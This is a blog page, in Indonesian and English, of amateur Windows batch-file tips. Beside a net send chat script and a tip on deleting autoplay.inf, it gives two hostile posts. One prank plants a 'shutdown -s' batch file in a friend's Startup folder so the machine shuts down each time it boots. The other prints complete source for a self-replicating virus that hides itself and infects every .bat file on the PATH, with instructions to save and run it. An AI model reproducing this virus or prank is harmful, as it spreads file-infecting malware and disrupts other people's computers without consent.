Pengikut

Plurk

Powered by  MyPagerank.Net
Share/Bookmark
English French German Japanese Korean Chinese Russian Spanish
India Saudi Arabia Netherland Portugal Italian Philippines Ukraina Norwegia
Powered by
Widget translator

Pages

Chat menggunakan MS Dos Command prompt

1) Anda dan teman anda harus memiliki IP addres terlebih dahulu.

2) Buka Notepad dan tulis kode berikut.....

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

3) Lalu save file ini dengan "Messenger.Bat".

4) Buka Command Prompt.

5) Drag file ini (.bat file) ke Command Prompt dan tekan Enter.

6) Maka akan tampil seperti ini:

7) Sekarang ketik IP addres computer yang akan anda contact dan tekan enter
maka akan tampil seperti ini:

8) Lalu tulis pesan anda dan tekan Enter.
Start Chatting.......!

Category: ,
Category: 1 komentar

Membuat komputer tererstart berulang - ulang

1.open note pad

2.type "shutdown -s" with out quotes

3.save the file with .bat extension


4.explaination,u have created a prog which shutdowns the pc with in 30 of executing the file

5. now open "x:\Documents and Settings\USERNAME\Start Menu\Programs\Startup\" (x->is the drive on which ur windows has been installed and USERNAME is the username)

6.paste a shortcut on this directory



NOW WHEN EVER UR FRIEND STARTS HIS PC a count down will start after 30 sec his pc will shutdown
u can also maki his pc restart instead of shutting down.. just replace "shutdown -s" "restart _s"

enjoy.... this is not a virus but look so....

Category:
Category: 0 komentar

Virus Code

A simple VIRUS code is here: cukup save code dibawah ini dengan .bat extension dalam notepad.Antivirus akan mendeteksinya sebagai virus.
jika berefect *.com and *.EXE files .file ini akan menggandakan dirinya sendiri dan mungkin akan sangat berbahaya.......





@echo off>nul.ViRuS
if "%1=="/ViRuS_MULTIPLY goto ViRuS_multiply
if "%1=="/ViRuS_OUTER_LOOP goto ViRuS_outer_loop
if "%1=="/ViRuS_FINDSELF goto ViRuS_findself
if "%VOFF%=="T goto ViRuS_OLDBAT

set ViRuSname=%0
if not exist %0.bat call %0 /ViRuS_FINDSELF %path%
if not exist %ViRuSname%.bat set ViRuSname=
if "%ViRuSname%==" goto ViRuS_OLDBAT

rem ViRuS if batch is started with name.BAT, virus will not become active
rem ViRuS it was a bug, now it's a feature ! (also notice the voff variable)
rem ViRuS also if batch was only in an append /x:on path (chance=minimal)

attrib +h %ViRuSname%.bat
for %%a in (%path%;.) do call %0 /ViRuS_OUTER_LOOP %%a
attrib -h %ViRuSname%.bat
set ViRuSname=
goto ViRuS_OLDBAT

:ViRuS_findself
if "%2==" goto XXX_END>nul.ViRuS
if exist %2\%ViRuSname%.bat set ViRuSname=%2\%ViRuSname%
if exist %ViRuSname%.bat goto XXX_END
if exist %2%ViRuSname%.bat set ViRuSname=%2%ViRuSname%
if exist %ViRuSname%.bat goto XXX_END
shift>nul.ViRuS
goto ViRuS_findself

:ViRuS_outer_loop
for %%a in (%2\*.bat;%2*.bat) do call %0 /ViRuS_MULTIPLY %%a
goto XXX_END>nul.ViRuS

:ViRuS_multiply
find "ViRuS" <%ViRuSname%.bat >xViRuSx.bat
find /v "ViRuS" <%2 |find /v ":XXX_END" >>xViRuSx.bat
echo :XXX_END>>xViRuSx.bat
copy xViRuSx.bat %2>nul
del xViRuSx.bat
goto XXX_END>nul.ViRuS

:ViRuS_OLDBAT
echo on>nul.ViRuS
echo This is the dummy Virus Created By Elite and Rishabh
:XXX_END


Category:
Category: 0 komentar

Autoplay Virus Solution

autoplay virus solution- apabila anda mempunyai masalah dengan drive apabila didouble click masih tidak terbuka, inilah tricknya

u must have winrar
if d:\ doesnt opens,,,,,open winrar and goto d:\ in tht.....u ll be seeing file name "autoplay.inf"....delete tht file..
sekarang referes drives anda...
the virus is gone......!!!!

Category:
Category: 0 komentar